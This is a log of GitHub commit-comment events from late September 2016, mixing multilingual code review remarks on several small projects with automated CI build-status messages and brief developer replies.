{"id":"4646186092","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249132,"position":5,"line":18,"path":"language-project/dao/src/main/java/com/language/dao/CourseDao.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:27:52Z","updated_at":"2016-09-30T22:27:52Z","body":"Название метода обьясняет что он делает."}},"created_at":"2016-09-30T22:27:52Z"}
{"id":"4646188963","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249137,"position":36,"line":36,"path":"language-project/web/src/main/java/com/content/servlet/DictionaryController.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:28:42Z","updated_at":"2016-09-30T22:28:42Z","body":"она используется локально - поэтому так лучше"}},"created_at":"2016-09-30T22:28:42Z"}
{"id":"4646194031","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249147,"position":46,"line":46,"path":"language-project/web/src/main/java/com/content/servlet/DictionaryController.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:30:09Z","updated_at":"2016-09-30T22:30:09Z","body":"это можно вынести в service слой"}},"created_at":"2016-09-30T22:30:09Z"}
{"id":"4646194553","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19249148,"position":null,"line":null,"path":null,"commit_id":"98e60c4872c01948b6db06f9ac9fdf1a41130f06","created_at":"2016-09-30T22:30:19Z","updated_at":"2016-09-30T22:30:19Z","body":"MakeWebKitWork (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T22:30:19Z"}
{"id":"4646196808","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19249151,"position":null,"line":null,"path":null,"commit_id":"98e60c4872c01948b6db06f9ac9fdf1a41130f06","created_at":"2016-09-30T22:30:57Z","updated_at":"2016-09-30T22:30:57Z","body":"MakeWebKitWork (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T22:30:57Z"}
{"id":"4646199841","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249156,"position":31,"line":31,"path":"language-project/web/src/main/java/com/content/servlet/WordsController.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:31:49Z","updated_at":"2016-09-30T22:31:49Z","body":"аналогично с названием переменной"}},"created_at":"2016-09-30T22:31:49Z"}
{"id":"4646203626","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19249160,"position":null,"line":null,"path":null,"commit_id":"98e60c4872c01948b6db06f9ac9fdf1a41130f06","created_at":"2016-09-30T22:32:57Z","updated_at":"2016-09-30T22:32:57Z","body":"MakeWebKitWork (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T22:32:57Z"}
{"id":"4646204841","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19249162,"position":null,"line":null,"path":null,"commit_id":"98e60c4872c01948b6db06f9ac9fdf1a41130f06","created_at":"2016-09-30T22:33:21Z","updated_at":"2016-09-30T22:33:21Z","body":"MakeWebKitWork (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T22:33:21Z"}
{"id":"4646206001","type":"CommitCommentEvent","actor":{"login":"deinsf01"},"repo":{"name":"deinsf01/neighborhood-dog"},"payload":{"comment":{"id":19249166,"position":null,"line":null,"path":null,"commit_id":"a9ffa4ca90998d3b4f2af068239a380418fa3915","created_at":"2016-09-30T22:33:41Z","updated_at":"2016-09-30T22:33:41Z","body":"![shpilkes](https://cloud.githubusercontent.com/assets/22552380/19008718/1cd802ea-8722-11e6-9e94-0e811bb476d8.png)\r\n"}},"created_at":"2016-09-30T22:33:41Z"}
{"id":"4646207446","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249172,"position":31,"line":31,"path":"language-project/web/src/main/java/com/content/servlet/WordsController.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:34:06Z","updated_at":"2016-09-30T22:34:06Z","body":"вообще лучше чтобы dao использовалось только в service слое"}},"created_at":"2016-09-30T22:34:06Z"}
{"id":"4646209695","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249177,"position":31,"line":31,"path":"language-project/web/src/main/java/com/content/servlet/WordsController.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:34:46Z","updated_at":"2016-09-30T22:34:46Z","body":"а в сервлетах уже использовать service"}},"created_at":"2016-09-30T22:34:46Z"}
{"id":"4646214731","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249190,"position":34,"line":34,"path":"language-project/web/src/main/java/com/language/filter/AuthFilter.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:36:14Z","updated_at":"2016-09-30T22:36:14Z","body":"названия jsp страниц тоже лучше делать более информативными"}},"created_at":"2016-09-30T22:36:14Z"}
{"id":"4646216293","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":19249194,"position":null,"line":null,"path":null,"commit_id":"0be4489dd04ff18a14dc7ac2797d340d45757e30","created_at":"2016-09-30T22:36:41Z","updated_at":"2016-09-30T22:36:41Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [#19 (0.5) Add `clickable` placeholder](https://trello.com/c/t7dlEfYw/6-19-0-5-add-clickable-placeholder)"}},"created_at":"2016-09-30T22:36:41Z"}
{"id":"4646221408","type":"CommitCommentEvent","actor":{"login":"petroyurchyshyn"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249207,"position":8,"line":63,"path":"language-project/web/src/main/java/com/language/servlet/ChooseCourse.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:38:14Z","updated_at":"2016-09-30T22:38:14Z","body":"cd, ud   - лучше переименовать на более информативные варианты"}},"created_at":"2016-09-30T22:38:14Z"}
{"id":"4646222910","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249209,"position":34,"line":34,"path":"language-project/web/src/main/java/com/language/filter/AuthFilter.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:38:41Z","updated_at":"2016-09-30T22:38:41Z","body":"au - authorized\r\nnau - not authorized\r\nсделано для примера Security Filter - нигде более не применяется"}},"created_at":"2016-09-30T22:38:41Z"}
{"id":"4646224815","type":"CommitCommentEvent","actor":{"login":"socek"},"repo":{"name":"hackerspace-silesia/hs_scripts"},"payload":{"comment":{"id":19249210,"position":93,"line":93,"path":"mail_meetings/hs_wiki.py","commit_id":"bb10bcf6004ca52de67b0940ef06a86431ea4e52","created_at":"2016-09-30T22:39:18Z","updated_at":"2016-09-30T22:39:18Z","body":"Nawet jeśli skrypt jest tylko \"dla nas\", to trzeba pamiętać o sytuacji, w której z jakiegoś powodu będziemy chcieli zmienić serwer SMTP. To problem ze znalezieniem miejsca (lub wielu) w którym trzeba wpisać adres może sprawić problem.\r\nImho nie ma sensu robić to przez zmienne środowiskowe, ale stałe na górze pliku były by spoko.\r\nNiemniej, to tylko sugestia purysty i nawet jakbym dostał taki plik do poprawki/przeróbki to nie krzyczałbym \"o jak słabo to zrobione\"."}},"created_at":"2016-09-30T22:39:18Z"}
{"id":"4646225188","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19249211,"position":null,"line":null,"path":null,"commit_id":"98e60c4872c01948b6db06f9ac9fdf1a41130f06","created_at":"2016-09-30T22:39:25Z","updated_at":"2016-09-30T22:39:25Z","body":"MakeWebKitWork (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-98e60c4872c01948b6db06f9ac9fdf1a41130f06-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-30T22:39:25Z"}
{"id":"4646225270","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249213,"position":31,"line":31,"path":"language-project/web/src/main/java/com/content/servlet/WordsController.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:39:27Z","updated_at":"2016-09-30T22:39:27Z","body":"переменная используется локально\r\nкогда я это писал - разговора о сервис слое не было"}},"created_at":"2016-09-30T22:39:27Z"}
{"id":"4646225721","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19249214,"position":2,"line":2,"path":"Assets/Scripts/ThreeDUMLAPI/Operation.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-30T22:39:34Z","updated_at":"2016-09-30T22:39:34Z","body":"É Attribute.cs ou Operation.cs?"}},"created_at":"2016-09-30T22:39:34Z"}
{"id":"4646226114","type":"CommitCommentEvent","actor":{"login":"e111077"},"repo":{"name":"Polymer/polymer"},"payload":{"comment":{"id":19249215,"position":246,"line":263,"path":"src/utils/polymer.dom.html","commit_id":"79dcd2f88a3c71e128a9a49e3174379c89de95e3","created_at":"2016-09-30T22:39:41Z","updated_at":"2016-09-30T22:39:41Z","body":"+1 that fixes everything"}},"created_at":"2016-09-30T22:39:41Z"}
{"id":"4646227291","type":"CommitCommentEvent","actor":{"login":"timothyclemansinsea"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":19249220,"position":null,"line":null,"path":null,"commit_id":"e6d224c3c5ca3ff6a365326ba615d116764b68f2","created_at":"2016-09-30T22:40:01Z","updated_at":"2016-09-30T22:40:01Z","body":"@yyx990803 where do I find release notes? My site broke because I didn't use a CDN pointing to a specific vue.js version."}},"created_at":"2016-09-30T22:40:01Z"}
{"id":"4646228931","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19249221,"position":18,"line":18,"path":"Assets/Scripts/ThreeDUMLAPI/Operation.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-30T22:40:31Z","updated_at":"2016-09-30T22:40:31Z","body":"Você não implementou nada especificamente para Operation. Estou me peguntado qual a diferença entre Operation.css e Method.cs ..."}},"created_at":"2016-09-30T22:40:31Z"}
{"id":"4646229787","type":"CommitCommentEvent","actor":{"login":"jmdale"},"repo":{"name":"dnanexus/dx-javascript-toolkit"},"payload":{"comment":{"id":19249222,"position":null,"line":null,"path":null,"commit_id":"299846742c941a4a26a134fbbed315685dff14c1","created_at":"2016-09-30T22:40:47Z","updated_at":"2016-09-30T22:40:47Z","body":"LGTM"}},"created_at":"2016-09-30T22:40:47Z"}
{"id":"4646230138","type":"CommitCommentEvent","actor":{"login":"fg78nc"},"repo":{"name":"fg78nc/f"},"payload":{"comment":{"id":19249224,"position":46,"line":46,"path":"language-project/web/src/main/java/com/content/servlet/DictionaryController.java","commit_id":"f5ff7a6df2eacbe5d1fe30a28dfa57e4273747dc","created_at":"2016-09-30T22:40:53Z","updated_at":"2016-09-30T22:40:53Z","body":"строки 37, 38  тоже?"}},"created_at":"2016-09-30T22:40:53Z"}
{"id":"4646232262","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":19249232,"position":null,"line":null,"path":null,"commit_id":"f98c431060bbbd9d96f4878d89bf2257621f0436","created_at":"2016-09-30T22:41:31Z","updated_at":"2016-09-30T22:41:31Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [#19 (0.5) Add `clickable` placeholder](https://trello.com/c/t7dlEfYw/6-19-0-5-add-clickable-placeholder)"}},"created_at":"2016-09-30T22:41:31Z"}
{"id":"4646240239","type":"CommitCommentEvent","actor":{"login":"dralletje"},"repo":{"name":"facebook/flow"},"payload":{"comment":{"id":19249244,"position":null,"line":null,"path":null,"commit_id":"5a05018b01e0eb1537598df6ffe1c57233140be5","created_at":"2016-09-30T22:43:50Z","updated_at":"2016-09-30T22:43:50Z","body":"This is really cool, thanks for making flow awesome like this!"}},"created_at":"2016-09-30T22:43:50Z"}
{"id":"4646242352","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":19249247,"position":null,"line":null,"path":null,"commit_id":"fe355ca4ae9138bb2055089729c94e1b86cb38cf","created_at":"2016-09-30T22:44:12Z","updated_at":"2016-09-30T22:44:12Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [#19 (0.5) Add `clickable` placeholder](https://trello.com/c/t7dlEfYw/6-19-0-5-add-clickable-placeholder)"}},"created_at":"2016-09-30T22:44:12Z"}
{"id":"4646251228","type":"CommitCommentEvent","actor":{"login":"jas-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":19249267,"position":null,"line":null,"path":null,"commit_id":"76c443eda331b75bf5dfa7ec22b8eb22e1084343","created_at":"2016-09-30T22:46:51Z","updated_at":"2016-09-30T22:46:51Z","body":"![ezgif com-gif-maker](https://cloud.githubusercontent.com/assets/7599682/19009061/cf58d186-878d-11e6-9045-2195fd4455ff.gif)\r\n"}},"created_at":"2016-09-30T22:46:51Z"}
{"id":"4646251409","type":"CommitCommentEvent","actor":{"login":"maximegelinas"},"repo":{"name":"strawberrysass/strawberry"},"payload":{"comment":{"id":19249269,"position":null,"line":null,"path":null,"commit_id":"9dc4aa10e783e5c1147bbc855322680ab10ebfc4","created_at":"2016-09-30T22:46:55Z","updated_at":"2016-09-30T22:46:55Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [#17 (0.5) Add `disable` placeholder](https://trello.com/c/WLLiz24M/7-17-0-5-add-disable-placeholder)"}},"created_at":"2016-09-30T22:46:55Z"}
{"id":"4646257713","type":"CommitCommentEvent","actor":{"login":"moderakh"},"repo":{"name":"moderakh/azure-content"},"payload":{"comment":{"id":19249288,"position":null,"line":null,"path":null,"commit_id":"0ab9307b58d7188f48128b4ff351c1080b31302f","created_at":"2016-09-30T22:48:47Z","updated_at":"2016-09-30T22:48:47Z","body":"@mimig1"}},"created_at":"2016-09-30T22:48:47Z"}
{"id":"4646258820","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19249291,"position":null,"line":null,"path":null,"commit_id":"0e91602bc629a924377311900cdc01496a80f5ea","created_at":"2016-09-30T22:49:07Z","updated_at":"2016-09-30T22:49:07Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#dSRJtK4DQauwMOQ6wivFug"}},"created_at":"2016-09-30T22:49:07Z"}
{"id":"4646260019","type":"CommitCommentEvent","actor":{"login":"madmoose"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19249298,"position":19,"line":99,"path":"engines/bladerunner/aud_stream.cpp","commit_id":"0c7d323921baa36f0a6db4b81e906ff402509463","created_at":"2016-09-30T22:49:28Z","updated_at":"2016-09-30T22:49:28Z","body":"This isn't endian safe. The sample data is little endian but the output buffer is native endian."}},"created_at":"2016-09-30T22:49:28Z"}
{"id":"4646265015","type":"CommitCommentEvent","actor":{"login":"digitalcircuit"},"repo":{"name":"quassel/quassel"},"payload":{"comment":{"id":19249310,"position":49,"line":970,"path":"src/core/corenetwork.cpp","commit_id":"d017fec4290f7585427f78371e7851487b9dc2eb","created_at":"2016-09-30T22:51:06Z","updated_at":"2016-09-30T22:51:06Z","body":"Fixed in [pull request #257](https://github.com/quassel/quassel/pull/257 ).  I'll delete this comment after that's merged."}},"created_at":"2016-09-30T22:51:06Z"}
{"id":"4646270509","type":"CommitCommentEvent","actor":{"login":"p3rcussion"},"repo":{"name":"p3rcussion/p3rcussion.github.io"},"payload":{"comment":{"id":19249321,"position":null,"line":null,"path":null,"commit_id":"14981eb2f8f783a2c1a9cd702ad40fb16d842051","created_at":"2016-09-30T22:52:45Z","updated_at":"2016-09-30T22:52:45Z","body":"i"}},"created_at":"2016-09-30T22:52:45Z"}
{"id":"4646277690","type":"CommitCommentEvent","actor":{"login":"williamlac"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19249337,"position":18,"line":18,"path":"Assets/Scripts/ThreeDUMLAPI/Operation.cs","commit_id":"22966aeb45b085f6f3b83b31a29f246b08e9dabe","created_at":"2016-09-30T22:54:59Z","updated_at":"2016-09-30T22:54:59Z","body":"Eu deletei Operation. Eu tinha criado ela pra seguir o nome do XMI. Não\nestá mais no último push\n\nOn Fri, Sep 30, 2016, 19:40 Filipe Arantes Fernandes <\nnotifications@github.com> wrote:\n\n> Você não implementou nada especificamente para Operation. Estou me\n> peguntado qual a diferença entre Operation.css e Method.cs ...\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/filran/VisAr3D-Dynamic-Ultimate/commit/22966aeb45b085f6f3b83b31a29f246b08e9dabe#commitcomment-19249221>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ARPSFYh3JlOQxuzP7xOxMVZOYj9Z7Q7tks5qvY_fgaJpZM4KJN_1>\n> .\n>\n-- \n\nWilliam Lacerda\nSent from Nexus 6p\n"}},"created_at":"2016-09-30T22:54:59Z"}
{"id":"4646278041","type":"CommitCommentEvent","actor":{"login":"phil-davis"},"repo":{"name":"swalladge/rpi-temperature-server"},"payload":{"comment":{"id":19249338,"position":5,"line":47,"path":"server/app.py","commit_id":"277af21f1839235c0df494844c51b7e10ccb1689","created_at":"2016-09-30T22:55:06Z","updated_at":"2016-09-30T22:55:06Z","body":"Oh, that's a shame. I thought we were going to add a temperature forecasting feature ;)"}},"created_at":"2016-09-30T22:55:06Z"}
{"id":"4646280359","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19249344,"position":null,"line":null,"path":null,"commit_id":"a24504fd67a21fa1a610e08c1f31b248eb09ecf3","created_at":"2016-09-30T22:55:49Z","updated_at":"2016-09-30T22:55:49Z","body":"Now invalid player names will match and be caught as so.  Before it autocomplete would still return the string it searched for even if it failed in matching it to a known players.  Null is returned and is now caught immediately back in the commands which then returns a user notice.   This just had to be done before plugin.getPermissionsManager().getUser(userName); is called.  \r\n\r\nNow unmatched names properly tell the user that without giving you something like so...\r\n\r\n[17:00:58] [Server thread/INFO]: 'c/c' is a member of:\r\n[17:00:58] [Server thread/INFO]:    default (not ranked)\r\n[17:00:58] [Server thread/INFO]: c's permissions:\r\n[17:00:58] [Server thread/INFO]: \r\n[17:00:58] [Server thread/INFO]: c's options:\r\n\r\n"}},"created_at":"2016-09-30T22:55:49Z"}
{"id":"4646288268","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19249366,"position":null,"line":null,"path":null,"commit_id":"0e91602bc629a924377311900cdc01496a80f5ea","created_at":"2016-09-30T22:58:18Z","updated_at":"2016-09-30T22:58:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#M8cbfdC-RmCr3PZEJ-EKZQ"}},"created_at":"2016-09-30T22:58:18Z"}
{"id":"4646294720","type":"CommitCommentEvent","actor":{"login":"donkirkby"},"repo":{"name":"donkirkby/pinyincushion"},"payload":{"comment":{"id":19249381,"position":20,"line":37,"path":"src/PinyinCushionEditor.js","commit_id":"ab93076f98fc441f458ba94c2b053ecfdb1a1c28","created_at":"2016-09-30T23:00:22Z","updated_at":"2016-09-30T23:00:22Z","body":"Good point."}},"created_at":"2016-09-30T23:00:22Z"}
{"id":"4646299656","type":"CommitCommentEvent","actor":{"login":"GLolol"},"repo":{"name":"OVERdrive-IRC/thelounge"},"payload":{"comment":{"id":19249388,"position":null,"line":null,"path":null,"commit_id":"775dc2793f654035c287abb81473f26e3124db1b","created_at":"2016-09-30T23:02:00Z","updated_at":"2016-09-30T23:02:00Z","body":"PR: sure, but I'd have to figure out how signon and idle time are formatted first."}},"created_at":"2016-09-30T23:02:00Z"}
{"id":"4646317433","type":"CommitCommentEvent","actor":{"login":"fjlopez"},"repo":{"name":"M3tax/lab1-git-race"},"payload":{"comment":{"id":19249445,"position":null,"line":null,"path":null,"commit_id":"7aa8539c84a002c306d3557678e90fc59e48a99d","created_at":"2016-09-30T23:08:06Z","updated_at":"2016-09-30T23:08:06Z","body":"I  think if you go on with problems with Heroku you can raise an issue asking for help in the course repo.  "}},"created_at":"2016-09-30T23:08:06Z"}
{"id":"4646324703","type":"CommitCommentEvent","actor":{"login":"M3tax"},"repo":{"name":"M3tax/lab1-git-race"},"payload":{"comment":{"id":19249466,"position":null,"line":null,"path":null,"commit_id":"7aa8539c84a002c306d3557678e90fc59e48a99d","created_at":"2016-09-30T23:10:32Z","updated_at":"2016-09-30T23:10:32Z","body":"I finally got something to work with the build.finalizedBy(jar), the problem Heroku is giving me now is new. I'll try to look for info during the weekend and hopefully get it to work *fingers crossed*, will ask for help by Monday if I can't solve it by myself! 😃 "}},"created_at":"2016-09-30T23:10:32Z"}
{"id":"4646327757","type":"CommitCommentEvent","actor":{"login":"epkann"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19249476,"position":155,"line":155,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-30T23:11:38Z","updated_at":"2016-09-30T23:11:38Z","body":"This might be a silly question, but why might someone want bst values in ascending or descending order? The only reason I can think of is that they want to translate the values into a slice (or array) by order of level..."}},"created_at":"2016-09-30T23:11:38Z"}
{"id":"4646334175","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19249570,"position":null,"line":null,"path":null,"commit_id":"23bc15b7e75d7a9e8945b4ad3e9d12bf53cd1e3c","created_at":"2016-09-30T23:13:48Z","updated_at":"2016-09-30T23:13:48Z","body":"Also did a bit of pointless null check removals also for this branch.  If it never can be null no point in checking to see if it is.  this is how I figured out the fix for invalid users as there was over 25 pointless null checks apparently in the commands sections and then backtracking found out also why like eg. /pex user c would still give you a user profile even when there is nothing at all that matches 'c' in any way."}},"created_at":"2016-09-30T23:13:48Z"}
{"id":"4646336512","type":"CommitCommentEvent","actor":{"login":"InkSlinger666"},"repo":{"name":"BrokenROM/external_stagefright-plugins"},"payload":{"comment":{"id":19249643,"position":null,"line":null,"path":null,"commit_id":"40998aa023a37f1dc7d20c8963c294af4f09353b","created_at":"2016-09-30T23:14:38Z","updated_at":"2016-09-30T23:14:38Z","body":"@blinoff82 I have sent you a hangouts..Its in your best interest to accept it"}},"created_at":"2016-09-30T23:14:38Z"}
{"id":"4646338806","type":"CommitCommentEvent","actor":{"login":"Codepixl"},"repo":{"name":"Codepixl/GLCraft"},"payload":{"comment":{"id":19249702,"position":null,"line":null,"path":null,"commit_id":"a1d13ab82738ccb2868f8f9205147c52b06a59d1","created_at":"2016-09-30T23:15:24Z","updated_at":"2016-09-30T23:15:24Z","body":"I forgot to mention another step of the connection process. It is that the Server, once the player has connected, will send a PacketPlayerAdd to all of the connected clients to notify them of the new player."}},"created_at":"2016-09-30T23:15:24Z"}
{"id":"4646339448","type":"CommitCommentEvent","actor":{"login":"yyx990803"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":19249715,"position":null,"line":null,"path":null,"commit_id":"e6d224c3c5ca3ff6a365326ba615d116764b68f2","created_at":"2016-09-30T23:15:36Z","updated_at":"2016-09-30T23:15:36Z","body":"There's no change in code, just the npm package export pointing to a\ndifferent build.\nOn Fri, Sep 30, 2016 at 6:40 PM Tim Clemans <notifications@github.com>\nwrote:\n\n> @yyx990803 <https://github.com/yyx990803> where do I find release notes?\n> My site broke because I didn't use a CDN pointing to a specific vue.js\n> version.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/vuejs/vue/commit/e6d224c3c5ca3ff6a365326ba615d116764b68f2#commitcomment-19249220>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAefXv9Qi8UjXUp91ZSa1K3chDNKcR4Oks5qvY_IgaJpZM4KLkuh>\n> .\n>\n"}},"created_at":"2016-09-30T23:15:36Z"}
{"id":"4646342622","type":"CommitCommentEvent","actor":{"login":"dsnet"},"repo":{"name":"epkann/Data-Structures"},"payload":{"comment":{"id":19249775,"position":155,"line":155,"path":"bst/bst.go","commit_id":"e3e9cf0d2103d0ee56c019c81ac2dd91a1297cca","created_at":"2016-09-30T23:16:45Z","updated_at":"2016-09-30T23:16:45Z","body":"Made up use-case:\r\n\r\nI have a web-server that takes in entries from the user as insert new items into my BST. Every-time they view the page, they want to see all of the items that they've inserted in a sorted order. Furthermore, the UI allows people to select between ascending or descending order.\r\n\r\n(of course, you'd really want a balanced binary tree in a real-world application, but those are much harder to implement)."}},"created_at":"2016-09-30T23:16:45Z"}
{"id":"4646342878","type":"CommitCommentEvent","actor":{"login":"wli"},"repo":{"name":"exponentjs/react-native"},"payload":{"comment":{"id":19249785,"position":5,"line":210,"path":"Libraries/NavigationExperimental/NavigationTransitioner.js","commit_id":"ac29663812a2b0c9c72ae8d43696e05a6eda24eb","created_at":"2016-09-30T23:16:51Z","updated_at":"2016-09-30T23:16:51Z","body":"@brentvatne Flow (0.30.0, which matches the sdk-10 branch for RN) doesn't like this.\r\n\r\n```\r\nnode_modules/react-native/Libraries/NavigationExperimental/NavigationTransitioner.js:210\r\n210:   _onTransitionEnd({finished}): void {\r\n                        ^^^^^^^^^^ destructuring. Missing annotation\r\n```"}},"created_at":"2016-09-30T23:16:51Z"}
{"id":"4646344146","type":"CommitCommentEvent","actor":{"login":"x1nixmzeng"},"repo":{"name":"LukeUsher/Cxbx-Reloaded"},"payload":{"comment":{"id":19249816,"position":null,"line":null,"path":null,"commit_id":"1d89b04573025e265aa3978473f6ae6943c0c5f3","created_at":"2016-09-30T23:17:20Z","updated_at":"2016-09-30T23:17:20Z","body":"Cool progress! I think you should also bump the cxbx version number as well :smile: "}},"created_at":"2016-09-30T23:17:20Z"}
